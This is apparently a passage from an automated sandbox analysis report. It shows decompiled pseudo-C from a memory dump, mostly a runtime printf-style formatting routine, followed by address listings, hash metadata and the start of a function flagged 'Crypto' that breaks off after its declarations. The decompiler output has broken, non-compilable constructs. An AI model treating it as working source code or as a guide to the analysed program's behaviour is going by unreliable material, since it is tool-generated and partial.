				if (0x7fffffff == 0x6e) goto 0xf8a7c573;
				if (0x7fffffff == 0x6f) goto 0xf8a7c563;
				if (0x7fffffff == 0x70) goto 0xf8a7c533;
				if (0x7fffffff == 0x73) goto 0xf8a7c3e1;
				if (0x7fffffff == 0x75) goto 0xf8a7c5a9;
				if (0x7fffffff != 0x78) goto 0xf8a7c7b0;
				goto 0xf8a7c543;
				_t181 = _t400 - 0x50;
				if ( *_t400 == r10w) goto 0xf8a7c502;
				if (_t181 != 0) goto 0xf8a7c4f2;
				goto 0xf8a7c52a;
				_t390 =  ==  ?  *0xf8a9c5b8 : _t389;
				_t404 =  ==  ?  *0xf8a9c5b8 : _t389;
				goto 0xf8a7c524;
				if ( *((intOrPtr*)( ==  ?  *0xf8a9c5b8 : _t389)) == r10b) goto 0xf8a7c528;
				if (_t181 - 1 != 0) goto 0xf8a7c51a;
				 *(_t446 + 0x44) = 0x7fffffff;
				goto 0xf8a7c7b0;
				r12d = 0x10;
				asm("inc ecx");
				 *((intOrPtr*)(_t446 + 0x60)) = 7;
				r9d = 0x10;
				if (r14b >= 0) goto 0xf8a7c5af;
				 *((char*)(_t446 + 0x4c)) = 0x30;
				 *((char*)(_t446 + 0x4d)) = 0x58;
				goto 0xf8a7c5b3;
				r9d = 8;
				if (r14b >= 0) goto 0xf8a7c5af;
				r14d = r14d | r11d;
				goto 0xf8a7c5af;
				_t434 =  *_t478;
				_t185 = E0000025B25BF8A79CA0();
				r10d = 0;
				if (_t185 == 0) goto 0xf8a7cb1f;
				if ((r14b & 0x00000020) == 0) goto 0xf8a7c596;
				 *_t434 = _t267;
				goto 0xf8a7c598;
				 *_t434 = _t267;
				 *(_t446 + 0x5c) = 1;
				goto 0xf8a7c911;
				r14d = r14d | 0x00000040;
				r9d = 0xa;
				_t311 = 0x00008000 & r14d;
				if (_t311 == 0) goto 0xf8a7c5c7;
				goto 0xf8a7c601;
				asm("inc ecx");
				if (_t311 < 0) goto 0xf8a7c5bd;
				_t481 = _t478 + 0x18;
				if ((r14b & 0x00000020) == 0) goto 0xf8a7c5f1;
				 *((long long*)(_t446 + 0x70)) = _t481;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5ea;
				goto 0xf8a7c606;
				r8d =  *(_t481 - 8) & 0x0000ffff;
				goto 0xf8a7c606;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5fd;
				_t451 =  *(_t481 - 8);
				goto 0xf8a7c601;
				r8d =  *(_t481 - 8);
				 *((long long*)(_t446 + 0x70)) = _t481;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c619;
				if (_t451 >= 0) goto 0xf8a7c619;
				asm("inc ecx");
				_t317 = 0x00008000 & r14d;
				if (_t317 != 0) goto 0xf8a7c628;
				asm("inc ecx");
				if (_t317 < 0) goto 0xf8a7c628;
				if (r12d >= 0) goto 0xf8a7c635;
				r12d = 1;
				goto 0xf8a7c640;
				r14d = r14d & 0xfffffff7;
				r12d =  >  ? r11d : r12d;
				r13d =  *((intOrPtr*)(_t446 + 0x60));
				_t391 = _t444 + 0x1cf;
				asm("sbb ecx, ecx");
				 *(_t446 + 0x48) = 0x7fffffff - __ebx &  *(_t446 + 0x48);
				r12d = r12d - 1;
				if (r12d > 0) goto 0xf8a7c669;
				if ( ~_t451 == 0) goto 0xf8a7c689;
				_t66 = _t426 + 0x30; // 0x30
				_t188 = _t66;
				if (_t188 - 0x39 <= 0) goto 0xf8a7c682;
				_t189 = _t188 + r13d;
				 *_t391 = _t189;
				goto 0xf8a7c65a;
				_t482 =  *((intOrPtr*)(_t446 + 0x70));
				_t378 = _t444 + 0x1cf;
				_t190 = _t189 - __ebx;
				_t393 = _t391 - 1 + 1;
				 *(_t446 + 0x44) = _t190;
				if ((r11d & r14d) == 0) goto 0xf8a7c7b0;
				if (_t190 == 0) goto 0xf8a7c6b4;
				_t325 =  *_t393 - 0x30;
				if (_t325 == 0) goto 0xf8a7c7b0;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) + 1;
				 *((char*)(_t393 - 1)) = 0x30;
				goto 0xf8a7c7b0;
				if (_t325 != 0) goto 0xf8a7c6d3;
				if (r15b != 0x67) goto 0xf8a7c709;
				r12d = 1;
				goto 0xf8a7c709;
				r12d =  >  ? r11d : r12d;
				if (r12d - 0xa3 <= 0) goto 0xf8a7c709;
				_t259 = __r12 + 0x15d;
				E0000025B25BF8A7E798(_t393 - 1, _t259, _t434, _t441, _t444);
				 *((long long*)(_t444 - 0x80)) = _t378;
				_t329 = _t378;
				if (_t329 == 0) goto 0xf8a7c703;
				_t395 = _t378;
				goto 0xf8a7c709;
				r12d = 0xa3;
				_t379 =  *_t482;
				_t483 = _t482 + 8;
				_t442 = _t259;
				 *((long long*)(_t444 - 0x60)) = _t379;
				"%d\t%d\t%s\n"();
				r9d = r15b;
				 *((long long*)(_t446 + 0x30)) = _t444 - 0x58;
				 *(_t446 + 0x28) =  *(_t446 + 0x78);
				 *(_t446 + 0x20) = r12d;
				 *_t379();
				if (_t329 == 0) goto 0xf8a7c774;
				if (r12d != 0) goto 0xf8a7c774;
				"%d\t%d\t%s\n"();
				 *_t379();
				if (r15b != 0x67) goto 0xf8a7c794;
				if ((r14d & 0x00000080) != 0) goto 0xf8a7c794;
				"%d\t%d\t%s\n"();
				_t194 =  *_t379();
				if ( *_t395 != 0x2d) goto 0xf8a7c7a1;
				asm("inc ecx");
				_t396 = _t395 + 1;
				_t195 = E0000025B25BF8A82800(_t194, _t396);
				r10d = 0;
				 *(_t446 + 0x44) = _t195;
				if ( *(_t446 + 0x5c) != r10d) goto 0xf8a7c911;
				_t335 = r14b & 0x00000040;
				if (_t335 == 0) goto 0xf8a7c7f2;
				asm("inc ecx");
				if (_t335 >= 0) goto 0xf8a7c7cf;
				 *((char*)(_t446 + 0x4c)) = 0x2d;
				goto 0xf8a7c7da;
				if ((r14b & 0x00000001) == 0) goto 0xf8a7c7e5;
				 *((char*)(_t446 + 0x4c)) = 0x2b;
				 *(_t446 + 0x48) = 1;
				goto 0xf8a7c7f6;
				if ((r14b & 0x00000002) == 0) goto 0xf8a7c7f2;
				 *((char*)(_t446 + 0x4c)) = 0x20;
				goto 0xf8a7c7da;
				if ((r14b & 0x0000000c) != 0) goto 0xf8a7c81c;
				E0000025B25BF8A7CBBC(0x20,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
				E0000025B25BF8A7D648( *(_t446 + 0x48), _t396, _t446 + 0x4c, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				if ((r14b & 0x00000008) == 0) goto 0xf8a7c856;
				if ((r14b & 0x00000004) != 0) goto 0xf8a7c856;
				E0000025B25BF8A7CBBC(0x30,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				_t265 =  *(_t446 + 0x44);
				if ( *(_t446 + 0x50) == 0) goto 0xf8a7c8d1;
				if (_t265 <= 0) goto 0xf8a7c8d1;
				r9d =  *_t396 & 0x0000ffff;
				r8d = 6;
				_t199 = E0000025B25BF8A833AC();
				r10d = 0;
				if (_t199 != 0) goto 0xf8a7c8c3;
				if ( *((intOrPtr*)(_t444 - 0x78)) == 0) goto 0xf8a7c8c3;
				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
				_t200 = E0000025B25BF8A7D648( *((intOrPtr*)(_t444 - 0x78)), _t396, _t444 + 0x1d0, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				r10d = 0;
				if (_t265 - 1 != 0) goto 0xf8a7c868;
				goto 0xf8a7c8ef;
				 *(_t446 + 0x40) = _t200 | 0xffffffff;
				goto 0xf8a7c8f3;
				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
				E0000025B25BF8A7D648(_t265 - 1, _t396, _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				r10d = 0;
				if ( *(_t446 + 0x40) < 0) goto 0xf8a7c911;
				if ((r14b & 0x00000004) == 0) goto 0xf8a7c911;
				E0000025B25BF8A7CBBC(0x20,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t442, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				r10d = 0;
				_t383 =  *((intOrPtr*)(_t444 - 0x80));
				if (_t383 == 0) goto 0xf8a7c929;
				free(??);
				r10d = 0;
				 *((long long*)(_t444 - 0x80)) = __r10;
				_t435 =  *((intOrPtr*)(_t444 - 0x68));
				r11d = 0x200;
				r15b =  *_t435;
				if (r15b == 0) goto 0xf8a7cb37;
				r8d = r8d | 0xffffffff;
				goto 0xf8a7c2a6;
				if (r15b == 0x49) goto 0xf8a7c991;
				if (r15b == 0x68) goto 0xf8a7c98b;
				if (r15b == 0x6c) goto 0xf8a7c976;
				if (r15b != 0x77) goto 0xf8a7c942;
				asm("inc ecx");
				goto 0xf8a7c942;
				if ( *_t435 != 0x6c) goto 0xf8a7c985;
				_t436 =  &(_t435[0]);
				asm("inc ecx");
				goto 0xf8a7c942;
				r14d = r14d | 0x00000010;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000020;
				goto 0xf8a7c942;
				_t205 =  *_t436;
				asm("inc ecx");
				if (_t205 != 0x36) goto 0xf8a7c9ad;
				if (_t436[0] != 0x34) goto 0xf8a7c9ad;
				_t437 =  &(_t436[0]);
				asm("inc ecx");
				goto 0xf8a7c942;
				if (_t205 != 0x33) goto 0xf8a7c9c2;
				if (_t437[0] != 0x32) goto 0xf8a7c9c2;
				asm("inc ecx");
				goto 0xf8a7c942;
				_t359 = _t205 - 0x58 - 0x20;
				if (_t359 > 0) goto 0xf8a7c9dc;
				asm("dec eax");
				if (_t359 < 0) goto 0xf8a7c942;
				 *(_t446 + 0x58) = r10d;
				 *(_t446 + 0x50) = r10d;
				if (E0000025B25BF8A83194(r15b & 0xffffffff, _t359, _t383, _t444 - 0x58) == 0) goto 0xf8a7ca18;
				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				r15b = _t437[0];
				if (r15b == 0) goto 0xf8a7cb1f;
				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
				r10d = 0;
				goto 0xf8a7c92d;
				if (r15b != 0x2a) goto 0xf8a7ca51;
				r12d =  *_t483;
				if (r12d >= 0) goto 0xf8a7c942;
				r12d = r8d;
				goto 0xf8a7c942;
				r12d = __r12 + __r12 * 4;
				r12d = __r12 - 0x18;
				r12d = _t383 + __r12 * 2;
				goto 0xf8a7c942;
				r12d = r10d;
				goto 0xf8a7c942;
				if (r15b != 0x2a) goto 0xf8a7ca91;
				_t211 = _t483[2];
				 *(_t446 + 0x54) = _t211;
				if (_t211 >= 0) goto 0xf8a7c942;
				r14d = r14d | 0x00000004;
				goto 0xf8a7caa2;
				 *(_t446 + 0x54) = _t383 + 0x341041fd2;
				goto 0xf8a7c942;
				if (r15b == 0x20) goto 0xf8a7caf2;
				if (r15b == 0x23) goto 0xf8a7cae8;
				if (r15b == 0x2b) goto 0xf8a7cadf;
				if (r15b == 0x2d) goto 0xf8a7cad6;
				if (r15b != 0x30) goto 0xf8a7c942;
				r14d = r14d | 0x00000008;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000004;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000001;
				goto 0xf8a7c942;
				asm("inc ecx");
				goto 0xf8a7c942;
				r14d = r14d | 0x00000002;
				goto 0xf8a7c942;
				 *(_t446 + 0x78) = r10d;
				 *(_t446 + 0x5c) = r10d;
				 *(_t446 + 0x54) = r10d;
				 *(_t446 + 0x48) = r10d;
				r14d = r10d;
				r12d = r8d;
				 *(_t446 + 0x50) = r10d;
				goto 0xf8a7c942;
				_t217 = E0000025B25BF8A7B89C(_t383);
				 *_t383 = 0x16;
				E0000025B25BF8A7BEC4(_t217);
				r10d = 0;
				goto 0xf8a7cb39;
				if ( *((intOrPtr*)(_t444 - 0x40)) == r10b) goto 0xf8a7cb4a;
				 *( *((intOrPtr*)(_t444 - 0x48)) + 0xc8) =  *( *((intOrPtr*)(_t444 - 0x48)) + 0xc8) & 0xfffffffd;
				return E0000025B25BF8A81A50(_t383 + _t383 * 4, _t396,  *(_t444 + 0x1d8) ^ _t446,  *((intOrPtr*)(_t446 + 0x68)),  &(_t437[0]), _t442, _t444, __r12);
			}


























































                                                                                                                            0x25bf8a7c2cc
                                                                                                                            0x25bf8a7c2d5
                                                                                                                            0x25bf8a7c2e5
                                                                                                                            0x25bf8a7c2e8
                                                                                                                            0x25bf8a7c2ee
                                                                                                                            0x25bf8a7c2f0
                                                                                                                            0x25bf8a7c2f8
                                                                                                                            0x25bf8a7c300
                                                                                                                            0x25bf8a7c308
                                                                                                                            0x25bf8a7c310
                                                                                                                            0x25bf8a7c318
                                                                                                                            0x25bf8a7c320
                                                                                                                            0x25bf8a7c328
                                                                                                                            0x25bf8a7c32e
                                                                                                                            0x25bf8a7c332
                                                                                                                            0x25bf8a7c335
                                                                                                                            0x25bf8a7c33b
                                                                                                                            0x25bf8a7c344
                                                                                                                            0x25bf8a7c34d
                                                                                                                            0x25bf8a7c35b
                                                                                                                            0x25bf8a7c364
                                                                                                                            0x25bf8a7c369
                                                                                                                            0x25bf8a7c372
                                                                                                                            0x25bf8a7c377
                                                                                                                            0x25bf8a7c380
                                                                                                                            0x25bf8a7c386
                                                                                                                            0x25bf8a7c38b
                                                                                                                            0x25bf8a7c38f
                                                                                                                            0x25bf8a7c396
                                                                                                                            0x25bf8a7c39c
                                                                                                                            0x25bf8a7c39f
                                                                                                                            0x25bf8a7c3a4
                                                                                                                            0x25bf8a7c3a9
                                                                                                                            0x25bf8a7c3ab
                                                                                                                            0x25bf8a7c3ac
                                                                                                                            0x25bf8a7c3b8
                                                                                                                            0x25bf8a7c3bd
                                                                                                                            0x25bf8a7c3c2
                                                                                                                            0x25bf8a7c3ce
                                                                                                                            0x25bf8a7c3da
                                                                                                                            0x25bf8a7c3dc
                                                                                                                            0x25bf8a7c3e1
                                                                                                                            0x25bf8a7c3f0
                                                                                                                            0x25bf8a7c3fe
                                                                                                                            0x25bf8a7c407
                                                                                                                            0x25bf8a7c40f
                                                                                                                            0x25bf8a7c417
                                                                                                                            0x25bf8a7c41a
                                                                                                                            0x25bf8a7c426
                                                                                                                            0x25bf8a7c428
                                                                                                                            0x25bf8a7c42d
                                                                                                                            0x25bf8a7c438
                                                                                                                            0x25bf8a7c43a
                                                                                                                            0x25bf8a7c43f
                                                                                                                            0x25bf8a7c443
                                                                                                                            0x25bf8a7c44b
                                                                                                                            0x25bf8a7c450
                                                                                                                            0x25bf8a7c455
                                                                                                                            0x25bf8a7c457
                                                                                                                            0x25bf8a7c45f
                                                                                                                            0x25bf8a7c465
                                                                                                                            0x25bf8a7c46d
                                                                                                                            0x25bf8a7c474
                                                                                                                            0x25bf8a7c479
                                                                                                                            0x25bf8a7c481
                                                                                                                            0x25bf8a7c485
                                                                                                                            0x25bf8a7c489
                                                                                                                            0x25bf8a7c48d
                                                                                                                            0x25bf8a7c493
                                                                                                                            0x25bf8a7c499
                                                                                                                            0x25bf8a7c49f
                                                                                                                            0x25bf8a7c4a7
                                                                                                                            0x25bf8a7c4b0
                                                                                                                            0x25bf8a7c4b5
                                                                                                                            0x25bf8a7c4be
                                                                                                                            0x25bf8a7c4c7
                                                                                                                            0x25bf8a7c4d0
                                                                                                                            0x25bf8a7c4d5
                                                                                                                            0x25bf8a7c4de
                                                                                                                            0x25bf8a7c4e7
                                                                                                                            0x25bf8a7c4f0
                                                                                                                            0x25bf8a7c4f2
                                                                                                                            0x25bf8a7c4f8
                                                                                                                            0x25bf8a7c500
                                                                                                                            0x25bf8a7c508
                                                                                                                            0x25bf8a7c50d
                                                                                                                            0x25bf8a7c515
                                                                                                                            0x25bf8a7c518
                                                                                                                            0x25bf8a7c51f
                                                                                                                            0x25bf8a7c526
                                                                                                                            0x25bf8a7c52a
                                                                                                                            0x25bf8a7c52e
                                                                                                                            0x25bf8a7c533
                                                                                                                            0x25bf8a7c539
                                                                                                                            0x25bf8a7c543
                                                                                                                            0x25bf8a7c547
                                                                                                                            0x25bf8a7c550
                                                                                                                            0x25bf8a7c554
                                                                                                                            0x25bf8a7c55d
                                                                                                                            0x25bf8a7c561
                                                                                                                            0x25bf8a7c563
                                                                                                                            0x25bf8a7c56c
                                                                                                                            0x25bf8a7c56e
                                                                                                                            0x25bf8a7c571
                                                                                                                            0x25bf8a7c573
                                                                                                                            0x25bf8a7c57b
                                                                                                                            0x25bf8a7c580
                                                                                                                            0x25bf8a7c585
                                                                                                                            0x25bf8a7c58f
                                                                                                                            0x25bf8a7c591
                                                                                                                            0x25bf8a7c594
                                                                                                                            0x25bf8a7c596
                                                                                                                            0x25bf8a7c598
                                                                                                                            0x25bf8a7c5a0
                                                                                                                            0x25bf8a7c5a5
                                                                                                                            0x25bf8a7c5a9
                                                                                                                            0x25bf8a7c5b8
                                                                                                                            0x25bf8a7c5bb
                                                                                                                            0x25bf8a7c5c5
                                                                                                                            0x25bf8a7c5c7
                                                                                                                            0x25bf8a7c5cc
                                                                                                                            0x25bf8a7c5ce
                                                                                                                            0x25bf8a7c5d6
                                                                                                                            0x25bf8a7c5d8
                                                                                                                            0x25bf8a7c5e1
                                                                                                                            0x25bf8a7c5e8
                                                                                                                            0x25bf8a7c5ea
                                                                                                                            0x25bf8a7c5ef
                                                                                                                            0x25bf8a7c5f5
                                                                                                                            0x25bf8a7c5f7
                                                                                                                            0x25bf8a7c5fb
                                                                                                                            0x25bf8a7c5fd
                                                                                                                            0x25bf8a7c601
                                                                                                                            0x25bf8a7c60a
                                                                                                                            0x25bf8a7c60f
                                                                                                                            0x25bf8a7c614
                                                                                                                            0x25bf8a7c619
                                                                                                                            0x25bf8a7c61c
                                                                                                                            0x25bf8a7c61e
                                                                                                                            0x25bf8a7c623
                                                                                                                            0x25bf8a7c62b
                                                                                                                            0x25bf8a7c62d
                                                                                                                            0x25bf8a7c633
                                                                                                                            0x25bf8a7c635
                                                                                                                            0x25bf8a7c63c
                                                                                                                            0x25bf8a7c640
                                                                                                                            0x25bf8a7c648
                                                                                                                            0x25bf8a7c652
                                                                                                                            0x25bf8a7c656
                                                                                                                            0x25bf8a7c65d
                                                                                                                            0x25bf8a7c662
                                                                                                                            0x25bf8a7c667
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c67d
                                                                                                                            0x25bf8a7c67f
                                                                                                                            0x25bf8a7c682
                                                                                                                            0x25bf8a7c687
                                                                                                                            0x25bf8a7c689
                                                                                                                            0x25bf8a7c68e
                                                                                                                            0x25bf8a7c695
                                                                                                                            0x25bf8a7c697
                                                                                                                            0x25bf8a7c69a
                                                                                                                            0x25bf8a7c6a1
                                                                                                                            0x25bf8a7c6a9
                                                                                                                            0x25bf8a7c6ab
                                                                                                                            0x25bf8a7c6ae
                                                                                                                            0x25bf8a7c6b7
                                                                                                                            0x25bf8a7c6bb
                                                                                                                            0x25bf8a7c6be
                                                                                                                            0x25bf8a7c6c3
                                                                                                                            0x25bf8a7c6c9
                                                                                                                            0x25bf8a7c6cb
                                                                                                                            0x25bf8a7c6d1
                                                                                                                            0x25bf8a7c6d6
                                                                                                                            0x25bf8a7c6e1
                                                                                                                            0x25bf8a7c6e3
                                                                                                                            0x25bf8a7c6ee
                                                                                                                            0x25bf8a7c6f3
                                                                                                                            0x25bf8a7c6f7
                                                                                                                            0x25bf8a7c6fa
                                                                                                                            0x25bf8a7c6fc
                                                                                                                            0x25bf8a7c701
                                                                                                                            0x25bf8a7c703
                                                                                                                            0x25bf8a7c709
                                                                                                                            0x25bf8a7c714
                                                                                                                            0x25bf8a7c71c
                                                                                                                            0x25bf8a7c71f
                                                                                                                            0x25bf8a7c723
                                                                                                                            0x25bf8a7c72d
                                                                                                                            0x25bf8a7c730
                                                                                                                            0x25bf8a7c73c
                                                                                                                            0x25bf8a7c747
                                                                                                                            0x25bf8a7c74c
                                                                                                                            0x25bf8a7c757
                                                                                                                            0x25bf8a7c75c
                                                                                                                            0x25bf8a7c765
                                                                                                                            0x25bf8a7c772
                                                                                                                            0x25bf8a7c778
                                                                                                                            0x25bf8a7c77c
                                                                                                                            0x25bf8a7c785
                                                                                                                            0x25bf8a7c792
                                                                                                                            0x25bf8a7c797
                                                                                                                            0x25bf8a7c799
                                                                                                                            0x25bf8a7c79e
                                                                                                                            0x25bf8a7c7a4
                                                                                                                            0x25bf8a7c7a9
                                                                                                                            0x25bf8a7c7ac
                                                                                                                            0x25bf8a7c7b5
                                                                                                                            0x25bf8a7c7bb
                                                                                                                            0x25bf8a7c7bf
                                                                                                                            0x25bf8a7c7c1
                                                                                                                            0x25bf8a7c7c6
                                                                                                                            0x25bf8a7c7c8
                                                                                                                            0x25bf8a7c7cd
                                                                                                                            0x25bf8a7c7d3
                                                                                                                            0x25bf8a7c7d5
                                                                                                                            0x25bf8a7c7df
                                                                                                                            0x25bf8a7c7e3
                                                                                                                            0x25bf8a7c7e9
                                                                                                                            0x25bf8a7c7eb
                                                                                                                            0x25bf8a7c7f0
                                                                                                                            0x25bf8a7c809
                                                                                                                            0x25bf8a7c817
                                                                                                                            0x25bf8a7c82f
                                                                                                                            0x25bf8a7c834
                                                                                                                            0x25bf8a7c83d
                                                                                                                            0x25bf8a7c843
                                                                                                                            0x25bf8a7c851
                                                                                                                            0x25bf8a7c85b
                                                                                                                            0x25bf8a7c85f
                                                                                                                            0x25bf8a7c863
                                                                                                                            0x25bf8a7c868
                                                                                                                            0x25bf8a7c877
                                                                                                                            0x25bf8a7c883
                                                                                                                            0x25bf8a7c888
                                                                                                                            0x25bf8a7c88d
                                                                                                                            0x25bf8a7c894
                                                                                                                            0x25bf8a7c8ab
                                                                                                                            0x25bf8a7c8b0
                                                                                                                            0x25bf8a7c8b5
                                                                                                                            0x25bf8a7c8ba
                                                                                                                            0x25bf8a7c8c1
                                                                                                                            0x25bf8a7c8cb
                                                                                                                            0x25bf8a7c8cf
                                                                                                                            0x25bf8a7c8e2
                                                                                                                            0x25bf8a7c8e7
                                                                                                                            0x25bf8a7c8ec
                                                                                                                            0x25bf8a7c8f5
                                                                                                                            0x25bf8a7c8fb
                                                                                                                            0x25bf8a7c909
                                                                                                                            0x25bf8a7c90e
                                                                                                                            0x25bf8a7c911
                                                                                                                            0x25bf8a7c918
                                                                                                                            0x25bf8a7c91d
                                                                                                                            0x25bf8a7c922
                                                                                                                            0x25bf8a7c925
                                                                                                                            0x25bf8a7c929
                                                                                                                            0x25bf8a7c935
                                                                                                                            0x25bf8a7c942
                                                                                                                            0x25bf8a7c948
                                                                                                                            0x25bf8a7c94e
                                                                                                                            0x25bf8a7c952
                                                                                                                            0x25bf8a7c95b
                                                                                                                            0x25bf8a7c961
                                                                                                                            0x25bf8a7c967
                                                                                                                            0x25bf8a7c96d
                                                                                                                            0x25bf8a7c96f
                                                                                                                            0x25bf8a7c974
                                                                                                                            0x25bf8a7c979
                                                                                                                            0x25bf8a7c97b
                                                                                                                            0x25bf8a7c97e
                                                                                                                            0x25bf8a7c983
                                                                                                                            0x25bf8a7c985
                                                                                                                            0x25bf8a7c989
                                                                                                                            0x25bf8a7c98b
                                                                                                                            0x25bf8a7c98f
                                                                                                                            0x25bf8a7c991
                                                                                                                            0x25bf8a7c993
                                                                                                                            0x25bf8a7c99a
                                                                                                                            0x25bf8a7c9a0
                                                                                                                            0x25bf8a7c9a2
                                                                                                                            0x25bf8a7c9a6
                                                                                                                            0x25bf8a7c9ab
                                                                                                                            0x25bf8a7c9af
                                                                                                                            0x25bf8a7c9b5
                                                                                                                            0x25bf8a7c9bb
                                                                                                                            0x25bf8a7c9c0
                                                                                                                            0x25bf8a7c9c4
                                                                                                                            0x25bf8a7c9c6
                                                                                                                            0x25bf8a7c9d2
                                                                                                                            0x25bf8a7c9d6
                                                                                                                            0x25bf8a7c9dc
                                                                                                                            0x25bf8a7c9e9
                                                                                                                            0x25bf8a7c9f5
                                                                                                                            0x25bf8a7ca04
                                                                                                                            0x25bf8a7ca09
                                                                                                                            0x25bf8a7ca12
                                                                                                                            0x25bf8a7ca25
                                                                                                                            0x25bf8a7ca2a
                                                                                                                            0x25bf8a7ca2d
                                                                                                                            0x25bf8a7ca36
                                                                                                                            0x25bf8a7ca38
                                                                                                                            0x25bf8a7ca43
                                                                                                                            0x25bf8a7ca49
                                                                                                                            0x25bf8a7ca4c
                                                                                                                            0x25bf8a7ca51
                                                                                                                            0x25bf8a7ca59
                                                                                                                            0x25bf8a7ca5e
                                                                                                                            0x25bf8a7ca62
                                                                                                                            0x25bf8a7ca67
                                                                                                                            0x25bf8a7ca6a
                                                                                                                            0x25bf8a7ca73
                                                                                                                            0x25bf8a7ca75
                                                                                                                            0x25bf8a7ca7d
                                                                                                                            0x25bf8a7ca83
                                                                                                                            0x25bf8a7ca89
                                                                                                                            0x25bf8a7ca8f
                                                                                                                            0x25bf8a7caa2
                                                                                                                            0x25bf8a7caa6
                                                                                                                            0x25bf8a7caaf
                                                                                                                            0x25bf8a7cab5
                                                                                                                            0x25bf8a7cabb
                                                                                                                            0x25bf8a7cac1
                                                                                                                            0x25bf8a7cac7
                                                                                                                            0x25bf8a7cacd
                                                                                                                            0x25bf8a7cad1
                                                                                                                            0x25bf8a7cad6
                                                                                                                            0x25bf8a7cada
                                                                                                                            0x25bf8a7cadf
                                                                                                                            0x25bf8a7cae3
                                                                                                                            0x25bf8a7cae8
                                                                                                                            0x25bf8a7caed
                                                                                                                            0x25bf8a7caf2
                                                                                                                            0x25bf8a7caf6
                                                                                                                            0x25bf8a7cafb
                                                                                                                            0x25bf8a7cb00
                                                                                                                            0x25bf8a7cb05
                                                                                                                            0x25bf8a7cb0a
                                                                                                                            0x25bf8a7cb0f
                                                                                                                            0x25bf8a7cb12
                                                                                                                            0x25bf8a7cb15
                                                                                                                            0x25bf8a7cb1a
                                                                                                                            0x25bf8a7cb1f
                                                                                                                            0x25bf8a7cb24
                                                                                                                            0x25bf8a7cb2a
                                                                                                                            0x25bf8a7cb32
                                                                                                                            0x25bf8a7cb35
                                                                                                                            0x25bf8a7cb3d
                                                                                                                            0x25bf8a7cb43
                                                                                                                            0x25bf8a7cb73

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: write_multi_charwrite_string$write_char$_errno_invalid_parameter_noinfo_isleadbyte_l_malloc_crtfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2600834739-3916222277
                                                                                                                            • Opcode ID: e3e566d70056c7d1e8ce5c42388648ee8896ba91cc01bb873bcd7a67f372db64
                                                                                                                            • Instruction ID: 47c824dea6f9d2bf027e9a06ed0030d2d64c6f37a1fe349a434fac74f55515ae
                                                                                                                            • Opcode Fuzzy Hash: e3e566d70056c7d1e8ce5c42388648ee8896ba91cc01bb873bcd7a67f372db64
                                                                                                                            • Instruction Fuzzy Hash: 3332E173208E9486FF668A149C4C3BE6BA0F7457B6F341006FA4657ED5DB39C940EB28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01324F60 Relevance: 19.3, Strings: 15, Instructions: 545COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E01324F60(signed char __eax, signed int __esi, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, unsigned long long __rdi, long long __rbp, signed long long __r10, void* __r14, signed long long _a8, signed long long _a16) {
				char _v8;
				long long _v16;
				void* _v24;
				unsigned long long _v32;
				long long _v40;
				char _v48;
				signed long long _v56;
				signed long long _v64;
				signed long long _v72;
				unsigned long long _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				signed int _v112;
				signed long long _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed long long _v152;
				unsigned long long _v160;
				signed long long _v168;
				unsigned long long _v176;
				signed long long _v184;
				long long _v192;
				unsigned long long _v200;
				signed long long _v208;
				signed long long _v216;
				unsigned long long _v224;
				unsigned long long _v232;
				long long _v240;
				unsigned long long _v248;
				unsigned long long _v256;
				signed char _t189;
				void* _t265;
				void* _t266;
				signed char _t297;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				void* _t303;
				void* _t312;
				signed long long _t315;
				signed long long _t317;
				signed int _t331;
				signed long long _t357;
				unsigned long long _t361;
				signed int _t362;
				signed long long _t363;
				signed long long _t380;
				unsigned long long _t383;
				unsigned long long _t387;
				signed long long _t395;
				unsigned long long _t410;
				unsigned long long _t414;
				long long _t415;
				void* _t423;
				signed long long _t426;
				signed long long _t427;
				signed int* _t434;
				signed long long _t436;
				unsigned long long _t437;
				unsigned long long _t439;
				unsigned long long _t445;
				long long _t446;
				long long _t452;
				long long _t453;
				signed long long _t456;
				signed long long _t457;
				unsigned long long _t461;
				unsigned long long _t462;
				void* _t463;
				signed long long _t467;
				signed int _t478;
				unsigned long long _t482;
				intOrPtr _t487;
